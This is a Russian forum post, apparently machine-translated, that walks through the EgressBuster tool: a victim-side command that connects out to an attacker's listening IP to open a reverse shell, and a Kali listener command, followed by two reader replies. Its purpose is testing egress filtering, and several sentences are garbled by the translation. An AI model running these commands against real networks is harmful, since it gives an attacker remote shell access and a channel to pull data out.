Статья [новость - перевод] Egress Buster – взлом жертвы с помощью Command & Control с использованием брандмауэра

1531298627595.png


Сетевые брандмауэры действуют как фортификация для обеспечения безопасности внутренней корпоративной сети. Многие люди часто думают, что защищают устройство от входящего трафика. Большинство исходящих соединений небезопасны без фильтрации исходящего трафика.
Если фильтрация исходящего трафика (Egress Traffic Filtering) отключена, злоумышленники для управления внешней сетью.

Выходной фильтр отключает трафик, исходящий из вашей сети, и ограничивает выход из вашей сети внутренним пользователям и их уход, куда бы то ни было (разные сети). Таким образом, фильтрация исходящего трафика помогает смягчить фильтрацию данных из ваших сетевых активов.

Выполняя тестирование на проникновение компании делают исключения для портов, чтобы предотвратить доступ к внешнему Интернету. Так Egressbuster будет проверять эффективность фильтрации выхода в среде. Вы можете загрузить EgressBuster Здесь

В этом учебнике Kali Linux предоставлена информация о том, как работать с EgressBuster и как мы должны получить Shell.

Машина жертвы (Windows 10):
  • Запустите и выполните команду: egressbuster.exe <External Attackers Listening Ip> <Range of ports> shell.
1531298645289.png

  • Теперь он будет отправлять пакеты TCP на каждый порт, выходящий изнутри брандмауэра, на внешние порты прослушивания сервера.
  • Внешний сервер - это атакующая машина.
Примечание: Если корпоративная сеть защищена лучшими вариантами брандмауэра с фильтрацией исходящего трафика (Egress Traffic Filtering), она не должна разрешать доступ к внешней сети. Если фильтрация трафика отключена, она позволяет отдавать команды и управлять внешней сетью.
Атакующая машина (Kali Linux):


Внешняя сеть слушателя использует iptables для прослушивания на всех 65k портах для подключения.

1531298691679.png

  • Выполните команду: ./egress_listener.py <Kali Linux Ip or Attackers Ip> <Select Interface> <Victims Ip> shell
  • Если внутренняя сеть жертвы неэффективна в фильтрации выхода, в этом случае мы должны получить Shell!
Полученные машины жертвы – обход брандмауэра
  • Сеть жертвы открыта портом 1090/tcp и перенаправлена во внешнюю сеть из-за отсутствия фильтрации выхода.
1531298717195.png

  • Соединение успешно установлено в командный процессор, давайте вводить команды.
1531299011773.png


1531299020036.png

  • Теперь атакующий может совершать атаки на внутреннюю сеть..
Злоумышленники могут использовать эти технологии, чтобы собирать и отправлять важную информацию из вашей сети, а также атаковать или спамить другие сети.

Проверьте эффективность фильтрации выходных данных в вашей сети с помощью EgressBuster. Удачного взлома!!!

Вы можете получить ), чтобы защищать ваше приложение от веб-атак, и избежать серьезных утечек данных и непроизводительной потери времени.

Отказ от ответственности

Эта статья предназначена только для образовательной цели. За любые действия и/или деятельность, связанные с материалом, содержащимся на этом веб-сайте, исключительно вы несете ответственность. Неправильное использование информации на этом веб-сайте может привести к уголовным обвинениям, выдвинутым против соответствующих лиц. Авторы и не будут нести ответственность в том случае, если любые уголовные обвинения будут предъявлены против лиц, злоупотребляющих информацией, которая была получена на этом веб-сайте с целью нарушить закон.

Источник:
 
B

Boogeyman_n

мозг кипит, половина не понятно. Как можно постепенно во все это вникнуть новичку?
по возможности прошу дать ответ.
 
  • Нравится
Реакции: DarkAres

wizard76

Green Team
15.06.2018
109
105
BIT
16
Я про пост, ведь по пунктикам человек написал, или пусть линукс потихоньку осваивает, коль есть время и желание, чего сразу в дебри лезть, ему скорее всего сто лет это не нужно.
 
  • Нравится
Реакции: Сергей Попов
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!